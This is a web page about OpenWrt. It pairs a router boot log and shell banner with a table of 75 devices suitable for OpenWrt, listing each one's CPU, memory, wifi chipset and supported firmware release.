[ 13.070510] ath10k_pci 0000:00:00.0: 10.1 wmi init: vdevs: 16 peers: 127 tid: 256
[ 13.087967] ath10k_pci 0000:00:00.0: wmi print ‘P 128 V 8 T 410’
[ 13.094235] ath10k_pci 0000:00:00.0: wmi print ‘msdu-desc: 1424 sw-crypt: 0 ct-sta: 0’
[ 13.102583] ath10k_pci 0000:00:00.0: wmi print ‘alloc rem: 24680 iram: 26872’
[ 13.173746] ath10k_pci 0000:00:00.0: htt-ver 2.1 wmi-op 2 htt-op 2 cal file max-sta 128 raw 0 hwcrypto 1
[ 13.186560] ath10k_pci 0000:00:00.0: NOTE: Firmware DBGLOG output disabled in debug_mask: 0x10000000
[ 13.430308] ieee80211 phy1: Atheros AR9550 Rev:0 mem=0xb8100000, irq=13
[ 13.474723] kmodloader: done loading kernel modules from /etc/modules.d/*
[ 22.986315] br-lan: port 1(eth0) entered blocking state
[ 22.991620] br-lan: port 1(eth0) entered disabled state
[ 22.997194] device eth0 entered promiscuous mode
[ 23.028133] IPv6: ADDRCONF(NETDEV_UP): br-lan: link is not ready
[ 26.126181] eth0: link up (1000Mbps/Full duplex)
[ 27.073837] ath10k_pci 0000:00:00.0: 10.1 wmi init: vdevs: 16 peers: 127 tid: 256
[ 27.091303] ath10k_pci 0000:00:00.0: wmi print ‘P 128 V 8 T 410’
[ 27.097624] ath10k_pci 0000:00:00.0: wmi print ‘msdu-desc: 1424 sw-crypt: 0 ct-sta: 0’
[ 27.106176] ath10k_pci 0000:00:00.0: wmi print ‘alloc rem: 24680 iram: 26872’
[ 27.177482] ath10k_pci 0000:00:00.0: pdev param 0 not supported by firmware
[ 27.192963] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
[ 27.202223] br-lan: port 1(eth0) entered blocking state
[ 27.207280] br-lan: port 1(eth0) entered forwarding state
[ 27.237489] br-lan: port 2(wlan0) entered blocking state
[ 27.242883] br-lan: port 2(wlan0) entered disabled state
[ 27.248568] device wlan0 entered promiscuous mode
[ 27.259585] IPv6: ADDRCONF(NETDEV_CHANGE): br-lan: link becomes ready
[ 27.299689] IPv6: ADDRCONF(NETDEV_UP): wlan1: link is not ready
[ 27.363500] br-lan: port 3(wlan1) entered blocking state
[ 27.368951] br-lan: port 3(wlan1) entered disabled state
[ 27.374676] device wlan1 entered promiscuous mode
[ 27.379557] br-lan: port 3(wlan1) entered blocking state
[ 27.384982] br-lan: port 3(wlan1) entered forwarding state
[ 28.274480] br-lan: port 3(wlan1) entered disabled state
[ 34.529617] IPv6: ADDRCONF(NETDEV_CHANGE): wlan1: link becomes ready
[ 34.536246] br-lan: port 3(wlan1) entered blocking state
[ 34.541653] br-lan: port 3(wlan1) entered forwarding state
[ 41.787624] IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready
[ 41.794313] br-lan: port 2(wlan0) entered blocking state
[ 41.799762] br-lan: port 2(wlan0) entered forwarding state
BusyBox v1.30.1 () built-in shell (ash)
_______ ________ __
| |.—–.—–.—–.| | | |.—-.| |_
| – || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
—————————————————–
OpenWrt SNAPSHOT, r9848 27-c8a8294f6e
—————————————————–
[email protected]:/#
Table of hardware: ideal for openwrt (16/128mb or more)
In order to list devices you’ll have the best experience with, here we filter for devices that…
Special notes:
Show Filter: Availability
Show Filter: Device Type
Show Filter: Modem
Show Filter: Current Supported Release
# | Device Type | ↓Brand | Model | Versions | Availability | Supported Current Rel | Unsupported Functions | CPU | CPU MHz | CPU cores | Flash MB | RAM MB | 100M ports | Gbit ports | WLAN 2.4GHz | WLAN 5.0GHz | WLAN Comments | WLAN Hardware | Modem | USB ports | OEM Device Homepage | Device Page | OpenWrt Forum Topic URL | Device Techdata |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 | WiFi Router | 8devices | Habanero DVK | Available 2020 | 21.02.3 | Qualcomm IPQ4019 | 717 | 4 | 32, microSD | 512 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA4019 | – | 1x 2.0, 1x 3.0 | https://www.8devices.com/products/habanero | View/Edit data | |||||
2 | Single Board Computer | 8devices | Jalapeno | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 700 | 4 | 128NAND, 8 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | 1x 2.0, 1x 3.0, 1x mini-USB (power) | https://www.8devices.com/products/jalapeno | View/Edit data | |||||
3 | Single Board Computer | 8devices | Rambutan | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9557 | 720 | 1 | 128NAND | 128 | 1 | 1 | b/g/n | a/n | ¿ | – | 1x 2.0 | http://www.8devices.com/products/rambutan | View/Edit data | |||||
4 | Single Board Computer | Abicom International | Scorpion SC300M | Available 2020 | 19.07.10 | Qualcomm Atheros QCA9550 | 700 | 1 | 16 | 256 | – | 1 | b/g/n | a/n | Qualcomm Atheros QCA9550 | – | Yes | http://www.abicom.co.uk/products/oem-wireless-bridges/ | View/Edit data | |||||
5 | Single Board Computer | Abicom International | Scorpion SC450 | Rev 02 | Available 2020 | 19.07.10 | Qualcomm Atheros QCA9550 | 700 | 1 | 16, 256NAND | 256 | – | 1 | – | a/n/ac | Qualcomm Atheros QCA9550 | – | 2x 2.0 | http://www.abicom.co.uk/products/oem-wireless-bridges/ | scorpion450 | View/Edit data | |||
6 | Single Board Computer | Abicom International | Scorpion SC1750 | 4 | Available 2020 | 19.07.10 | Qualcomm Atheros QCA9550 | 700 | 1 | 16 | 256 | – | 2 | – | a/n/ac | QCA9890/QCA9892 | – | 1x 2.0 | http://www.abicom.co.uk/products/oem-wireless-bridges/ | sc1750 | View/Edit data | |||
7 | WiFi Router | ADSLR | G7 | unknown 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 256 | – | 5 | b/g/n | a/n/ac | 4×4 MU-MIMO | MediaTek MT7615N | – | – | http://www.adslr.com/product/85.html | View/Edit data | ||||
8 | WiFi AP | AirTight | C-75 | unknown 2020 | 21.02.3 | Green power LED | Qualcomm Atheros QCA9550 | ¿ | 1 | 32 | 128 | – | 2 | b/g/n | ¿ | Qualcomm Atheros QCA9550, Qualcomm Atheros QCA9890 | – | 1x 2.0 | http://¿ | View/Edit data | ||||
9 | WiFi AP | ALFA Network | AP120C-AC | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 717 | 4 | 128NAND, 16 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | – | View/Edit data | ||||||
10 | WiFi AP | ALFA Network | N2Q | unknown 2020 | 21.02.3 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 2 | – | b/g/n | – | Qualcomm Atheros QCA9531 | – | 1x 2.0 | https://www.alfa.com.tw/products_detail/328.htm | View/Edit data | |||||
11 | Single Board Computer | ALFA Network | Pi-WiFi4 | unknown 2020 | 21.02.3 | Qualcomm Atheros QCA9531 | 650 | 1 | 16, 32, 64 | 128 | 2 | – | b/g/n | – | Qualcomm Atheros QCA9531 | – | 1x µUSB (power), 4x 2.0 | https://www.alfa.com.tw/products/pi-wifi4_pcba?variant=36473967509576 | View/Edit data | |||||
12 | WiFi Router | ALFA Network | AP120C | Available 2020 | 18.06.9 | Atheros AR9344 | 533 | 1 | 16 | 128 | – | 1 | b/g/n | a/n | 2×2 | Atheros AR9344 | – | – | ap120c | https://forum.openwrt.org/viewtopic.php?pid=270401 | View/Edit data | |||
13 | Switch | ALLNET | ALL-SG8208M | unknown 2021 | 21.02.0 | Realtek RTL8380M | 500 | 1 | 16 | 128 | – | 8 | – | – | – | – | http://¿ | View/Edit data | ||||||
14 | Amped Wireless | ALLY-R1900K | unknown 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 128 | – | 4 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 3.0 | https://ampedwireless.com/ally-r1900.html | View/Edit data | ||||||
15 | Amped Wireless | ALLY-00X19K | unknown 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 128 | – | 1 | b/g/n | a/n/ac | MediaTek MT7615N | – | https://ampedwireless.com/ally-r1900.html | View/Edit data | |||||||
16 | WiFi AP | Araknis | AN-700-AP-I-AC | unknown 2022 | snapshot | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | ¿ | ¿ | http://¿ | View/Edit data | |||||
17 | WiFi AP | Araknis | AN-300-AP-I-N | unknown 2022 | snapshot | AR9344 | ¿ | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | Atheros AR9344, Atheros AR9382 | ¿ | ¿ | http://¿ | View/Edit data | |||||
18 | WiFi AP | Araknis | AN-500-AP-I-AC | unknown 2022 | snapshot | Qualcomm Atheros QCA9557 | ¿ | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9557, Qualcomm Atheros QCA9882 | – | – | http://¿ | View/Edit data | |||||
19 | WiFi Router | Arcadyan / Astoria | ARV7519RW22 (Livebox 2.1) | unknown 2022 | 19.07.10 | WiFi 2.4GHz | Lantiq XWAY VRX288 | 500 | 2 | 32 | 128 | 4 | 1 | b/g/n | – | 2×2 MIMO | Lantiq XWAY WAVE300 | ADSL2 Annex A | 2x 2.0 | arv7519rw22 | View/Edit data | |||
20 | WiFi Router | Arris | TR4400 | v2 | unknown 2020 | snapshot | Qualcomm Atheros IPQ8065 | ¿ | 2 | 256NAND | 512 | – | 5 | b/g/n | a/n/ac | single board with miniPCIe connector | QCA9983 2.4 GHz b/g/n 3×3, QCA9984 5 GHz a/n/ac 4×4 | – | 1x 3.0 | https://fccid.io/UIDTR4400/User-Manual/User-Manual-3519922.pdf | tr4400_v2 | https://forum.openwrt.org/t/arris-tr4400-v2-rac2v1a-support/122585 | View/Edit data | |
21 | WiFi AP | Aruba | AP-303 | unknown 2022 | 21.02.3 | Qualcomm IPQ4029 | 716 | 4 | 128NAND | 512 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019 | – | – | https://www.arubanetworks.com/products/networking/access-points/303-series/ | ap-303 | View/Edit data | ||||
22 | WiFi AP | Aruba | AP-365 | Available 2020 | 21.02.3 | Qualcomm IPQ4029 | 716 | 4 | 128NAND | 512 | – | 1 | b/g/n | a/n/ac | Qualcomm IPQ4029 | – | 1x 2.0 | https://www.arubanetworks.com/products/networking/access-points/360-series/ | ap-365 | View/Edit data | ||||
23 | WiFi AP | Aruba | AP-303H | unknown 2022 | 21.02.3 | Qualcomm IPQ4029 | 716 | 4 | 128NAND | 512 | – | 1 | b/g/n | a/n/ac | Qualcomm IPQ4029 | – | 1x 2.0 | https://www.arubanetworks.com/de/products/netzwerkprodukte/access-points/aruba-303h/ | ap-303h | View/Edit data | ||||
24 | WiFi AP | Aruba | AP-105 | Available 2022 | 21.02.3 | Atheros AR7161 | 680 | 1 | 16 | 128 | – | 1 | b/g/n | a/n | Atheros AR9220, Atheros AR9223 | – | – | ap-105 | View/Edit data | |||||
25 | WiFi Router | AsiaRF | AP7621-001 | Available 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 256 | – | 2 | b/g/n | a/n/ac | MIMO | MediaTek MT7612E, MediaTek MT7621A | – | 1x 3.0 | https://www.asiarf.com/shop/wifi-wlan/wifi_ap_router/mt7621-enterprise-router-board-2-giga-ethernet-ports-3-mini-pcie-usb-2-0-usb-3-0-gps-ap7621-001-1/ | View/Edit data | ||||
26 | Router | AsiaRF | AP7621-002 | Available 2020 | 18.06.0 | MediaTek MT7621A | 880 | 2 | 16 | 512 | – | 5 | b/g/n | a/n/ac | MIMI WAVE2 | MediaTek MT7612E, MediaTek MT7615E | – | 1x 2.0 Device, 1x 3.0 | https://www.asiarf.com/shop/wifi-wlan/wifi_ap_router/wifi-router-board-mt7621-rs232-rs485-ap7621-002-manufacturer/ | ap7621-002 | View/Edit data | |||
27 | WiFi Router | AsiaRF | AP7621-IL1 | 1 | Available 2020 | snapshot | MediaTek MT7621A | 880 | 2 | 16 | 512 | ¿ | 2 | b/g/n | a/n/ac | MediaTek MT7615N | ¿ | 1x 3.0, Yes | http://¿ | View/Edit data | ||||
28 | Router | AsiaRF | AP7621-NV1 | Available 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16, microSDXC | 512 | – | 3 | b/g/n | a/n/ac | 3x mini-PCIe | ¿ | – | 1x 2.0 Device, 1x 3.0 | https://www.asiarf.com/shop/wifi-wlan/wifi_ap_router/mt7621-enterprise-router-board-poe-pse-pd-3-giga-ethernet-ports-3-mini-pcie-usb-2-0-usb-3-0-gps-ap7621-nv1-1/ | View/Edit data | ||||
29 | WiFi Router | AsiaRF | AP7623-A02 | Available 2020 | 21.02.3 | MediaTek MT7623A | 1300 | 4 | 8192 eMMC | 512 | – | 5 | b/g/n | a/n/ac | MIMO WAVE2 | MediaTek MT7612E, MediaTek MT7615E | ¿ | 1x 2.0 Device, 1x 3.0 | https://www.asiarf.com/shop/wifi-wlan/wifi_ap_router/wifi-router-board-openwrt-arm-cortex-a7-1-3ghz-mt7623a-ap7623-a02/ | ap7623-a02 | View/Edit data | |||
30 | WiFi Router | Askey | RT4230W | REV6 | Available 2020 | snapshot | Qualcomm Atheros IPQ8065 | 1700 | 2 | 512NAND | 1024 | – | 5 | b/g/n | a/n/ac | Wifi card is actually 2 identical chips with their own miniPCIe connections | 2x Qualcomm Atheros QCA9984 4×4 | – | 1x 3.0 | https://www.askey.com.tw/wireless_RT4230W.html | rt4230w_rev6 | https://forum.openwrt.org/t/askey-rac2v1k-support/15830 | View/Edit data | |
31 | WiFi Router | ASUS | RT-AC85P | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 3.0 | https://www.asus.com/Networking/RT-AC85P/ | rt-ac85p | View/Edit data | ||||
32 | WiFi Router | ASUS | GT-AC5300 | Available 2021 | 21.02.3 | WiFi 2.4GHz, WiFi 5GHz | Broadcom BCM4908 | 1800 | 4 | 256NAND | 1024 | – | 9 | b/g/n | a/n/ac | Broadcom BCM4366E | – | 2x 3.0 | https://rog.asus.com/us/networking/rog-rapture-gt-ac5300-model/ | View/Edit data | ||||
33 | WiFi Router | ASUS | Lyra (MAP-AC2200) | Available 2022 | 21.02.3 | Qualcomm IPQ4019 | 717 | 4 | 128NAND | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019, Qualcomm Atheros QCA9886 | – | – | https://www.asus.com/Networking/Lyra/ | lyra_map-ac2200 | View/Edit data | ||||
34 | WiFi Router | ASUS | RT-AC57U | v1 | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 2.0 | https://www.asus.com/Networking/RT-AC57U/ | rt-ac57u | View/Edit data | |||
35 | WiFi Router | ASUS | RT-AC58U | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 or IPQ4019 | 717 | 4 | 128 | 128 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 or IPQ4019 | – | 1x 3.0 | https://www.asus.com/Networking/RT-AC58U/ | rt-ac58u | https://forum.openwrt.org/t/asus-rt-ac58u-crashes-under-heavy-load-after-a-while/33008?u=tmomas | View/Edit data | |||
36 | WiFi Router | ASUS | RT-AC65P | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 3.0 | https://www.asus.com/Networking/RT-AC65P/ | rt-ac85p | View/Edit data | ||||
37 | WiFi Router | ASUS | RT-AC68U | v1 | Available 2022 | 21.02.3 | WiFi 2.4GHz partly, WiFi 5GHz | Broadcom BCM4708A0 | 800 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | Broadcom BCM4360 | – | 1x 2.0, 1x 3.0 | https://www.asus.com/Networking/RTAC68U/ | rt-ac68u | https://forum.openwrt.org/viewtopic.php?id=51005, https://forum.openwrt.org/viewtopic.php?id=52378 | View/Edit data | |
38 | WiFi Router | ASUS | RT-AC87U | Available 2022 | 21.02.3 | WiFi 2.4GHz partly, WiFi 5GHz | Broadcom BCM4709A0 | 1000 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | Broadcom BCM4360, Quantenna QT2518B, Quantenna QT3840BC | – | 1x 2.0, 1x 3.0 | https://www.asus.com/Networking/RTAC87U/ | rt-ac87u | https://forum.openwrt.org/viewtopic.php?id=52537 | View/Edit data | ||
39 | WiFi Router | ASUS | RT-N18U | A1 | Available 2022 | 21.02.3 | WiFi 2.4GHz partly | Broadcom BCM47081A0 | 800 | 1 | 128NAND | 256 | – | 5 | b/g/n | – | Broadcom BCM4360 | – | 1x 2.0, 1x 3.0 | https://www.asus.com/Networking/RTN18U/ | rt-n18u | https://forum.openwrt.org/viewtopic.php?id=53417 | View/Edit data | |
40 | WiFi Router | ASUS | RT-N56U | B1 | unknown 2020 | 21.02.3 | MediaTek MT7621ST | 880 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7612EN | – | 2x 2.0 | https://www.asus.com/uk/Networking/RTN56U_B1 | rt-n56u_b1 | View/Edit data | |||
41 | WiFi Router | ASUS | RT-ACRH13 | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 710 | 4 | 128 | 128 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | 1x 3.0 | https://www.asus.com/us/Networking/RT-ACRH13/ | rt-ac58u | https://forum.openwrt.org/t/support-for-asus-wireless-ac1300-rt-acrh13/1133/13 | View/Edit data | |||
42 | WiFi Router | ASUS | RT-AC1300UHP | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 716 | 4 | 128 | 256 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | 1x 3.0 | https://www.asus.com/Networking/RT-AC1300UHP/specifications/ | rt-ac58u | View/Edit data | ||||
43 | WiFi Router | ASUS | RT-AC42U | unknown 2022 | snapshot | Qualcomm Atheros IPQ4019 | 717 | 4 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019, Qualcomm Atheros QCA9984 | – | 1x 3.0 | http://¿ | View/Edit data | |||||
44 | WiFi Router | ASUS | RT-AC88U | Available 2022 | snapshot | White WAN LED | Broadcom BCM4709C0KFEBG | 1400 | 2 | 128 | 512 | – | 9 | b/g/n | a/n/ac | Broadcom BCM4366C0 | – | 1x 2.0, 1x 3.0 | https://www.asus.com/Networking-IoT-Servers/WiFi-Routers/ASUS-WiFi-Routers/RT-AC88U/ | rt-ac88u | https://forum.openwrt.org/t/openwrt-support-for-asus-rt-ac88u/78635 | View/Edit data | ||
45 | WiFi Router | Atlantis | A02-RB-W300N | v1.0 | unknown 2022 | 19.07.7 | Atheros AR9130 | ¿ | 1 | ¿ | ¿ | 5 | – | b/g/n | – | ¿ | – | – | http://www.atlantisland.it/pub/prodotti.php?famiglia=1&l1=2&l2=3&articolo=QTAyLVJCLVczMDBO | View/Edit data | ||||
46 | WiFi Router | AVM | FRITZ!Box 3490 | unknown 2021 | PR pending | Lantiq XWAY VRX288 / PSB 80920 EL | 500 | 2 | 512NAND, 8 | 256 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | VDSL2 | 2x 3.0 | https://forum.openwrt.org/t/port-to-avm-fritz-box-3490/52692 | View/Edit data | |||||
47 | WiFi Router | AVM | FRITZ!Box 4040 | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 638 | 4 | 32 | 256 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | 1x 2.0, 1x 3.0 | https://avm.de/produkte/fritzbox/fritzbox-4040/ | avm_fritz_box_4040 | https://forum.openwrt.org/t/fritz-box-4040-experiences/64487 | View/Edit data | |||
48 | WiFi Router | AVM | FRITZ!Box 7530 | Available 2022 | 21.02.3 | DECT, DSL modem | Qualcomm IPQ4019 | 716 | 4 | 128NAND | 256 | – | 4 | b/g/n | a/n/ac | Qualcomm IPQ4019 | xDSL | 1x 3.0 | https://avm.de/produkte/fritzbox/fritzbox-7530/ | avm_fritz_box_7530 | View/Edit data | |||
49 | Range Extender | AVM | FRITZ!Repeater 1200 | Available 2022 | 21.02.3 | Qualcomm IPQ4019 | 717 | 4 | 128NAND | 256 | – | 1 | b/g/n | a/n/ac | Qualcomm IPQ4019 | – | – | https://avm.de/produkte/fritzwlan/fritzrepeater-1200/ | avm_fritz_repeater_1200 | View/Edit data | ||||
50 | Range Extender | AVM | FRITZ!Repeater 3000 | Available 2022 | 21.02.3 | Qualcomm IPQ4019 | 717 | 4 | 128NAND | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019, Qualcomm Atheros QCA9984 | – | – | https://avm.de/produkte/fritzwlan/fritzrepeater-3000/ | View/Edit data | |||||
51 | WiFi Router | AVM | FRITZ!Box 7490 | Available 2022 | PR pending | Lantiq XWAY VRX288 / PSB 80920 EL | 500 | 2 | 512NAND, 8 | 256 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | VDSL2 | 2x 3.0 | https://en.avm.de/products/fritzbox/fritzbox-7490/technical-data/ | fritz.box.7490 | https://forum.openwrt.org/t/support-fritzbox-7490/4112 | View/Edit data | |||
52 | WiFi Router | AVM | FRITZ!Box 4020 | Available 2022 | 21.02.3 | USB | Qualcomm Atheros QCA9561 | 750 | 1 | 16 | 128 | 5 | – | b/g/n | – | Qualcomm Atheros QCA9561 | – | 1x 2.0 | https://avm.de/produkte/fritzbox/fritzbox-4020/ | fritz.box.4020 | View/Edit data | |||
53 | WiFi Router | AVM | FRITZ!Box 7520 | Available 2022 | snapshot | DECT, DSL modem | Qualcomm IPQ4019 | 716 | 4 | 128NAND | 256 | – | 4 | b/g/n | a/n/ac | Qualcomm IPQ4019 | xDSL | 1x 3.0 | http://¿ | avm_fritz_box_7530 | View/Edit data | |||
54 | Single Board Computer | Avnet | ZedBoard | Available 2022 | 21.02.3 | Xilinx XC7Z020 | 667 | 2 | 256, SD | 512 | – | 1 | – | – | – | – | 1x OTG | http://zedboard.org/product/zedboard | View/Edit data | |||||
55 | WiFi Router | BDCOM | WAP2100-SK | unknown 2022 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 16, SD | 128 | 5 | – | b/g/n | – | ¿ | – | 1x 2.0 | http://www.bdcom.cn/products_detail/productId=95.html | View/Edit data | |||||
56 | WiFi Router | Beeline | Smartbox Flash | Available 2022 | snapshot | MediaTek MT7621A | 880 | 2 | 128NAND | 256 | – | 3 | b/g/n | a/n/ac | DBDC, MIMO 2×2 2.4 and 5 GHz | MediaTek MT7615DN | – | 1x 3.0 | https://moskva.beeline.ru/customers/pomosh/home/domashnij-internet/nastrojki-s-routerom/smart-box-flash/ | smartbox_flash | https://forum.openwrt.org/t/add-support-for-beeline-smartbox-flash/ | View/Edit data | ||
57 | WiFi Router | Beeline | SmartBox PRO | unknown 2022 | PR pending | MT7621AT | 880 | 2 | 256 | 256 | – | 5 | b/g/n | a/n/ac | MIMO 2×2 | MediaTek MT7602EN, MediaTek MT7612EN | – | 2x 2.0 | https://moskva.beeline.ru/customers/pomosh/home/domashnij-internet/nastrojki-s-routerom/beelinesmartboxpro-weblogin/ | smartbox_pro | https://forum.openwrt.org/t/adding-support-for-sercomm-s1500-clones-beeline-smartbox-pro-wifire-s1500-nbn/110065/2 | View/Edit data | ||
58 | WiFi Router | Belkin | RT3200 | Available 2021 | snapshot | MediaTek MT7622BV | 1350 | 2 | 128NAND | 512 | – | 5 | b/g/n | a/n/ac/ax | MediaTek MT7622BV, MediaTek MT7915E | – | 1x 2.0 | https://www.belkin.com/us/p/P-RT3200/ | e8450 | https://forum.openwrt.org/t/belkin-rt3200-linksys-e8450-wifi-ax-discussion/94302 | View/Edit data | |||
59 | WiFi Router | Belkin | F9J1108 | v2 | unknown 2020 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558-ATA4, Qualcomm Atheros QCA9880-2R4E | ADSL2 | 1x 2.0, 1x 3.0 | http://¿ | View/Edit data | ||||
60 | WiFi Router | BT | Home Hub 5 | Type A | unknown 2022 | 21.02.3 | Lantiq XWAY VRX268 | 500 | 2 | 128NAND | 128 | – | 5 | b/g/n | a/n/ac | Atheros AR9287, Qualcomm Atheros QCA9880 | VDSL2 | 1x 2.0 | homehub_v5a | View/Edit data | ||||
61 | WiFi Router | Buffalo | WSR-2533DHP2 | unknown 2021 | snapshot | MediaTek MT7622 | 1350 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615, MediaTek MT7622 | – | – | https://www.buffalo.jp/product/detail/wsr-2533dhp2-cb.html | View/Edit data | |||||
62 | WiFi Router | Buffalo | WXR-2533DHP | unknown 2022 | 21.02.3 | Qualcomm Atheros IPQ8064 | 1400 | 2 | 256 | 512 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9880 | – | 2x 3.0 | View/Edit data | ||||||
63 | WiFi Router | Buffalo | WXR-1900DHP | unknown 2022 | 21.02.3 | WiFi 2.4GHz partly, WiFi 5GHz | Broadcom BCM4709A0 | 1000 | 2 | 128 | 512 | – | 5 | b/g/n | a/n/ac | Broadcom BCM4360 | – | 1x 2.0, 1x 3.0 | View/Edit data | |||||
64 | WiFi Router | Buffalo | WZR-900DHP | unknown 2022 | 21.02.3 | WiFi 2.4GHz partly, WiFi 5GHz | Broadcom BCM47081A0 | 800 | 1 | 128 | 256 | – | 5 | b/g/n | a | Broadcom BCM4331 | – | 1x 3.0 | https://forum.openwrt.org/viewtopic.php?id=54456 | View/Edit data | ||||
65 | WiFi Router | Buffalo | WSR-1166DHP | unknown 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612E | – | – | wsr-1166dhp | https://forum.openwrt.org/viewtopic.php?id=62413 | View/Edit data | ||||
66 | WiFi Router | Buffalo | WZR-450HP2 | unknown 2022 | 19.07.10 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 5 | b/g/n | – | Qualcomm Atheros QCA9558 | ¿ | ¿ | wzr-450hp2 | View/Edit data | |||||
67 | WiFi Router | Buffalo | WTR-M2133HP | Available 2020 | 21.02.3 | Qualcomm IPQ4019 | 717 | 4 | 128NAND | 512 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros QCA4019, Qualcomm Atheros QCA9884 | – | 1x 3.0 | https://www.buffalo.jp/product/detail/wtr-m2133hp.html | View/Edit data | |||||
68 | WiFi Router | Buffalo | WSR-2533DHPL | Available 2020 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | – | https://www.buffalo.jp/product/detail/wsr-2533dhpl.html | wsr-2533dhpl | View/Edit data | ||||
69 | WiFi Router | Cell C | RTL30VW | unknown 2020 | 21.02.3 | Qualcomm IPQ4019 | ¿ | 4 | 128NAND, 16 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA4019 | LTE | 2x 2.0 | http://¿ | rtl30vw | View/Edit data | ||||
70 | NAS | Cloud Engines | Pogoplug V2 | POGO-E02 | unknown 2022 | 21.02.3 | Marvell 88F6281 | 1200 | 1 | 128 | 256 | – | 1 | – | – | – | – | 4x 2.0 | pogoplug | View/Edit data | ||||
71 | NAS | Cloud Engines | Pogoplug V4 | POGO-V4-A3-01, POGO-V4-A3-02 | Available 2020 | 21.02.3 | Marvell 88F6192 | 800 | 1 | 128NAND, SD | 128 | – | 1 | – | – | – | – | 1x 2.0, 2x 3.0 | pogoplug_v4 | View/Edit data | ||||
72 | NAS | Cloud Engines | Pogoplug Mobile | POGO-V4-A1-01 | unknown 2022 | 21.02.3 | Marvell 88F6192 | 800 | 1 | 128NAND | 128 | – | 1 | – | – | – | – | 1x 2.0 | pogoplug_v4 | https://forum.openwrt.org/viewtopic.php?id=51769 | View/Edit data | |||
73 | WiFi AP | COMFAST | CF-E380AC | v2 | Available 2020 | 19.07.10 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 256 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | – | http://en.comfast.com.cn/product/WirelessNetworkBridge/item-219.html | View/Edit data | ||||
74 | WiFi AP | COMFAST | CF-E355AC | v2 | Available 2022 | 19.07.10 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 2 | – | b/g/n | a/n/ac | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9886 | – | – | http://en.comfast.com.cn/product/WirelessAP/item-218.html | View/Edit data | ||||
75 | WiFi AP | COMFAST | CF-E385AC | Available 2022 | 19.07.10 | LAN interface if connected at boot time | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9984 | – | – | http://en.comfast.com.cn/index.php?m=content&c=index&a=show&catid=17&id=55 | cf-e385ac | View/Edit data | |||
